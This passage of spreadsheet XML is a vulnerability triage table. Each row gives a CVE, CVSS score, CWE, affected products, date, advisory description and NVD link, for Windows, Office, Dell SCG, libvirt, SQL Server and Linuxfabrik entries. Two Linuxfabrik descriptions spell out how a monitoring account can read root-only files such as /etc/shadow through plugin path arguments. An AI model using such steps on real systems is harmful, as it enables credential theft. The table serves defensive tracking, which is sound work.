          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4676" s="5" t="inlineStr">
        <is>
          <t>adobe:illustrator, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4676" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4676" s="5" t="inlineStr"/>
      <c r="K4676" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4676" s="5" t="inlineStr">
        <is>
          <t>Illustrator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4676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71441</t>
        </is>
      </c>
    </row>
    <row r="4677">
      <c r="A4677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72937</t>
        </is>
      </c>
      <c r="C4677" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4677" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4677" s="5" t="inlineStr"/>
      <c r="F4677" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4677" s="5" t="inlineStr"/>
      <c r="H4677" s="5" t="inlineStr"/>
      <c r="I4677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4677" s="5" t="inlineStr"/>
      <c r="K4677" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4677" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72937</t>
        </is>
      </c>
    </row>
    <row r="4678">
      <c r="A4678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72945</t>
        </is>
      </c>
      <c r="C4678" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4678" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4678" s="5" t="inlineStr"/>
      <c r="F4678" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4678" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4678" s="5" t="inlineStr"/>
      <c r="I4678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4678" s="5" t="inlineStr"/>
      <c r="K4678" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4678" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t>
        </is>
      </c>
    </row>
    <row r="4679">
      <c r="A4679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72964</t>
        </is>
      </c>
      <c r="C4679" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4679" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4679" s="5" t="inlineStr"/>
      <c r="F4679" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4679" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4679" s="5" t="inlineStr"/>
      <c r="I4679" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4679" s="5" t="inlineStr"/>
      <c r="K4679" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4679" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t>
        </is>
      </c>
    </row>
    <row r="4680">
      <c r="A4680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72966</t>
        </is>
      </c>
      <c r="C4680" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4680" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4680" s="5" t="inlineStr"/>
      <c r="F4680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4680" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4680" s="5" t="inlineStr"/>
      <c r="I4680" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4680" s="5" t="inlineStr"/>
      <c r="K4680" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4680" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t>
        </is>
      </c>
    </row>
    <row r="4681">
      <c r="A4681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73004</t>
        </is>
      </c>
      <c r="C4681" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4681" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4681" s="5" t="inlineStr"/>
      <c r="F4681" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4681" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4681" s="5" t="inlineStr"/>
      <c r="I4681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4681" s="5" t="inlineStr"/>
      <c r="K4681" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4681" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t>
        </is>
      </c>
    </row>
    <row r="4682">
      <c r="A4682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73008</t>
        </is>
      </c>
      <c r="C4682" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4682" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4682" s="5" t="inlineStr"/>
      <c r="F4682" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4682" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H468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682" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4682" s="5" t="inlineStr"/>
      <c r="K4682" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="L4682" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t>
        </is>
      </c>
    </row>
    <row r="4683">
      <c r="A4683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73973</t>
        </is>
      </c>
      <c r="C4683" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4683" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4683" s="5" t="inlineStr"/>
      <c r="F4683" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4683" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H4683" s="5" t="inlineStr"/>
      <c r="I4683" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4683" s="5" t="inlineStr"/>
      <c r="K4683" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-269</t>
        </is>
      </c>
      <c r="L4683" s="5" t="inlineStr">
        <is>
          <t>Linuxfabrik Monitoring Plugins provides monitoring plugins for Icinga, Nagios, and related systems. Prior to version 7.0.0, check-plugins/logfile/logfile accepted a free-form --filename path and opened it as root when invoked through the shipped nagios or icinga sudoers allowlist, without confining the resolved path to /var/log. An attacker who controls the monitoring account can select a root-readable file such as /etc/shadow and use --warning-regex . while leaving SUPPRESS_OUTPUT false, causing each nonempty line to be collected in warn_matches and returned through lib.base.oao(). The vulnerable flow passes the expanded scan_path directly to open(), and neither real-path containment nor an allowlist protects the sink. The same fix also confines mysql-logfile and openvpn-client-list paths, allows only documented log roots, and resolves symlinks and parent-directory traversal before checking containment. This issue is fixed in version 7.0.0.</t>
        </is>
      </c>
      <c r="M4683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73973</t>
        </is>
      </c>
    </row>
    <row r="4684">
      <c r="A4684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73974</t>
        </is>
      </c>
      <c r="C4684" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4684" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4684" s="5" t="inlineStr"/>
      <c r="F4684" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4684" s="5" t="inlineStr">
        <is>
          <t>oracle, python</t>
        </is>
      </c>
      <c r="H4684" s="5" t="inlineStr"/>
      <c r="I4684" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4684" s="5" t="inlineStr"/>
      <c r="K4684" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-269</t>
        </is>
      </c>
      <c r="L4684" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations, and Linuxfabrik Monitoring Plugins uses its shared testing helper across check plugins. Prior to linuxfabrik-lib 6.1.0 and Linuxfabrik Monitoring Plugins 7.0.0, lib.lftest.test() treated the first or second element of a --test CSV argument as a filesystem path and returned the file contents as simulated standard output or standard error without path confinement. The hidden but production-accessible --test argument was accepted by sudo-authorized plugins, so an attacker controlling the nagios or icinga account could use check-plugins/deb-updates/deb-updates with its default QUERY=1 to disclose every line of a root-readable file. Approximately 22 other plugins exposed filtered content or a root file existence and readability oracle through the same helper, while check-plugins/network-bonding/network-bonding and check-plugins/openstack-swift-stat/openstack-swift-stat had direct read paths that bypassed the helper. The library fix confines fixture reads to the invoking plugin's unit-test directory and refuses unsafe anchors, and the plugin fix routes the two bypasses through that helper. These issues are fixed in linuxfabrik-lib 6.1.0 and Linuxfabrik Monitoring Plugins 7.0.0.</t>
        </is>
      </c>
      <c r="M4684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73974</t>
        </is>
      </c>
    </row>
    <row r="4685">
      <c r="A4685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77159</t>
        </is>
      </c>
      <c r="C4685" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4685" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4685" s="5" t="inlineStr"/>
      <c r="F4685" s="5" t="inlineStr"/>
      <c r="G4685" s="5" t="inlineStr"/>
      <c r="H4685" s="5" t="inlineStr"/>
      <c r="I4685" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4685" s="5" t="inlineStr"/>
      <c r="K4685" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L4685" s="5" t="inlineStr">
        <is>
          <t>A symlink-following flaw was found in libvirt's qemuTPMEmulatorPrepareHost() function. The function uses a path-based chown() on the swtpm logfile without checking for symbolic links. A local attacker with access to the swtpm account can replace the logfile with a symlink, causing libvirtd (running as root) to transfer ownership of an arbitrary file to the swtpm user.</t>
        </is>
      </c>
      <c r="M4685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77159</t>
        </is>
      </c>
    </row>
    <row r="4686">
      <c r="A4686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77488</t>
        </is>
      </c>
      <c r="C4686" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4686" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4686" s="5" t="inlineStr"/>
      <c r="F4686" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4686" s="5" t="inlineStr"/>
      <c r="H4686" s="5" t="inlineStr"/>
      <c r="I4686" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4686" s="5" t="inlineStr"/>
      <c r="K4686" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L4686" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t>
        </is>
      </c>
    </row>
    <row r="4687">
      <c r="A4687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="C4687" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4687" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4687" s="5" t="inlineStr"/>
      <c r="F4687" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4687" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4687" s="5" t="inlineStr"/>
      <c r="I4687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4687" s="5" t="inlineStr"/>
      <c r="K4687" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4687" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="4688">
      <c r="A4688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77492</t>
        </is>
      </c>
      <c r="C4688" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4688" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4688" s="5" t="inlineStr"/>
      <c r="F4688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4688" s="5" t="inlineStr"/>
      <c r="H4688" s="5" t="inlineStr"/>
      <c r="I4688" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4688" s="5" t="inlineStr"/>
      <c r="K4688" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4688" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77492</t>
        </is>
      </c>
    </row>
    <row r="4689">
      <c r="A4689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="C4689" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4689" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4689" s="5" t="inlineStr"/>
      <c r="F4689" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4689" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4689" s="5" t="inlineStr"/>
      <c r="I4689" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4689" s="5" t="inlineStr"/>
      <c r="K4689" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4689" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="4690">
      <c r="A4690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78487</t>
        </is>
      </c>
      <c r="C4690" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4690" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4690" s="5" t="inlineStr"/>
      <c r="F4690" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4690" s="5" t="inlineStr"/>
      <c r="H4690" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4690" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4690" s="5" t="inlineStr"/>
      <c r="K4690" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L4690"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M4690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78487</t>
        </is>
      </c>
    </row>
    <row r="4691">
      <c r="A4691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78506</t>
        </is>
      </c>
      <c r="C4691" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4691" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4691" s="5" t="inlineStr"/>
      <c r="F4691" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4691" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4691" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4691" s="5" t="inlineStr"/>
      <c r="K4691" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="L4691" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t>
        </is>
      </c>
    </row>
    <row r="4692">
      <c r="A4692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78513</t>
        </is>
      </c>
      <c r="C4692" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4692" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4692" s="5" t="inlineStr"/>
      <c r="F4692" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4692" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4692" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I4692" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4692" s="5" t="inlineStr"/>
      <c r="K4692" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4692" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t>
        </is>
      </c>
    </row>
    <row r="4693">
      <c r="A4693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79694</t>
        </is>
      </c>
      <c r="C4693" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4693" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4693" s="5" t="inlineStr"/>
      <c r="F4693" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4693" s="5" t="inlineStr"/>
      <c r="H4693" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4693" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4693" s="5" t="inlineStr"/>
      <c r="K4693" s="5" t="inlineStr">
        <is>
          <t>CWE-215</t>
        </is>
      </c>
      <c r="L4693" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insertion of Sensitive Information Into Debugging Code vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="M4693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79694</t>
        </is>
      </c>
    </row>
    <row r="4694">
      <c r="A4694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79910</t>
        </is>
      </c>
      <c r="C4694" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4694" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4694" s="5" t="inlineStr"/>
      <c r="F4694" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4694" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4694" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4694" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4694" s="5" t="inlineStr"/>
      <c r="K4694" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4694"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4694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t>
        </is>
      </c>
    </row>
    <row r="4695">
      <c r="A4695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79945</t>
        </is>
      </c>
      <c r="C4695" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4695" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4695" s="5" t="inlineStr"/>
      <c r="F4695" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G4695" s="5" t="inlineStr"/>
      <c r="H4695" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4695" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4695" s="5" t="inlineStr"/>
      <c r="K4695" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L4695"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M4695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79945</t>
        </is>
      </c>
    </row>
    <row r="4696">
      <c r="A4696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79947</t>
        </is>
      </c>
      <c r="C4696" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4696" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4696" s="5" t="inlineStr"/>
      <c r="F4696" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4696" s="5" t="inlineStr"/>
      <c r="H4696" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4696" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4696" s="5" t="inlineStr"/>
      <c r="K4696" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4696"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script injection.</t>
        </is>
      </c>
      <c r="M4696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79947</t>
        </is>
      </c>
    </row>
    <row r="4697">
      <c r="A4697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79975</t>
        </is>
      </c>
      <c r="C4697" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4697" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4697" s="5" t="inlineStr"/>
      <c r="F4697" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4697" s="5" t="inlineStr"/>
      <c r="H4697" s="5" t="inlineStr"/>
      <c r="I4697" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4697" s="5" t="inlineStr"/>
      <c r="K4697" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4697" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to server-side request forgery.</t>
        </is>
      </c>
      <c r="M4697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79975</t>
        </is>
      </c>
    </row>
    <row r="4698">
      <c r="A4698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80054</t>
        </is>
      </c>
      <c r="C4698" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4698" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4698" s="5" t="inlineStr"/>
      <c r="F4698" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4698" s="5" t="inlineStr"/>
      <c r="H4698" s="5" t="inlineStr"/>
      <c r="I4698" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4698" s="5" t="inlineStr"/>
      <c r="K4698" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L4698" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Incorrect Permission Assignment for Critical Resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M4698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80054</t>
        </is>
      </c>
    </row>
    <row r="4699">
      <c r="A4699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80056</t>
        </is>
      </c>
      <c r="C4699" s="5" t="n">
        <v>5.5</v>
      </c>
